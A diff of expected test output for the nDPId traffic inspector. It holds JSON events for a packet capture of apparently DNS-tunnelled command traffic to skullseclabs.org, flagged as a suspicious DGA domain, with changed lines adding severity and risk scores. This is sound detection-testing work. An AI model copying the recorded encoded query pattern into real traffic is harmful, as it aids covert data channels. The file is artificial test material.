+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"05e100a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1486012624242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1486012624242,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB38+5AAEARVH7AqCtbBAICBIx+ADUAY73N0g0BAAABAAAAAAAAODk1ODcwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="}
-00853{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012623234,"flow_last_seen":1486012624242,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012624242,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012623234,"flow_last_seen":1486012624242,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012624242,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1486012624325,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1486012624325,"pkt":"5LMYS\/DDAhoR+f4qCABFAACaAABAADMRVUoEAgIEwKgrWwA1jH4AhhPK0g2BgAABAAEAAAAAODk1ODcwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAcAMAA8AAQAAADwAFwAKEjYzNGYwMGE2MjEwMTBhMDAwMMBF"}
-00856{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012623234,"flow_last_seen":1486012624325,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1486012624325,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}}
+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012623234,"flow_last_seen":1486012624325,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1486012624325,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"958700a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1486012635073,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1486012635073,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3+zhAAEARTTTAqCtbBAICBNwiADUAYwrvCk0BAAABAAAAAAAAODI0NDMwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"244300fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012635073,"flow_last_seen":1486012635073,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012635073,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"244300fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1486012636079,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1486012636079,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3+7NAAEARTLnAqCtbBAICBNwiADUAY1S7n3sBAAABAAAAAAAAODZiNTAwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAAUAAQ=="}
-00853{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012635073,"flow_last_seen":1486012636079,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012636079,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"6b5000fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012635073,"flow_last_seen":1486012636079,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012636079,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"6b5000fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1486012637085,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1486012637085,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3\/ElAAEARTCPAqCtbBAICBNwiADUAY0RMqrgBAAABAAAAAAAAOGUxOGYwMGZkZjUyNTMyMDAyMTYzNmY2ZDZkNjE2ZTY0MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAAUAAQ=="}
-00853{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012635073,"flow_last_seen":1486012637085,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":273,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012637085,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e18f00fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00853{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1486012635073,"flow_last_seen":1486012638093,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012638093,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"46b100fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00854{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1486012635073,"flow_last_seen":1486012639101,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012639101,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00856{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1486012635073,"flow_last_seen":1486012639174,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":577,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1486012639174,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":16,"rsp_type":16,"rsp_addr":"0.0.0.0"}}
-00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":355,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1486012717360,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":367,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":347,"flow_first_seen":1486012635073,"flow_last_seen":1486012726429,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":79977,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1486012727434,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012635073,"flow_last_seen":1486012637085,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":273,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012637085,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e18f00fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1486012635073,"flow_last_seen":1486012638093,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012638093,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"46b100fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1486012635073,"flow_last_seen":1486012639101,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012639101,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1486012635073,"flow_last_seen":1486012639174,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":577,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1486012639174,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":16,"rsp_type":16,"rsp_addr":"0.0.0.0"}}
+00809{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":355,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1486012717360,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00812{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":367,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":347,"flow_first_seen":1486012635073,"flow_last_seen":1486012726429,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":79977,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1486012727434,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1486012730177,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1486012730177,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3Lk5AAEARGh\/AqCtbBAICBLdxADUAYz49\/HsBAAABAAAAAAAAOGEwNTcwMGU2ZGE4MzUxMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="}
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1486012730381,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1486012730381,"pkt":"5LMYS\/DDAhoR+f4qCABFAACaAABAADMRVUoEAgIEwKgrWwA1t3EAhvb+\/HuBgAABAAEAAAAAOGEwNTcwMGU2ZGE4MzUxMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAcAMAA8AAQAAADwAFwAKEmRlNjkwMGU2ZGE2ZWEyMDAwMMBF"}
-00858{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012730177,"flow_last_seen":1486012730381,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1486012730381,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}}
